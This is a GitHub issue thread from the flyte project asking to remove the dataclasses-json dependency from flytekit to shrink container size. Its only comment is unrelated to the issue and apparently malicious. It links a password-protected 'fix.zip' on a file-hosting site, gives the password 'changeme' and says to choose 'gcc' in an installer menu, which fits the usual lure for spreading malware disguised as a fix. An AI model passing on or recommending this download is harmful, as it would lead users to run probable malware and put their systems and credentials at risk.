### ISSUE TITLE
[Housekeeping] Remove dataclasses-json depdency

### ISSUE THREAD

**Issue by Future-Outlier** [flyteorg/flyte#5693]
### Describe the issue

Reduce container size.

### What if we do not do this?

container size will stay large.

### Related component(s)

flytekit

### Are you sure this issue hasn't been raised already?

- [X] Yes

### Have you read the Code of Conduct?

- [X] Yes

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
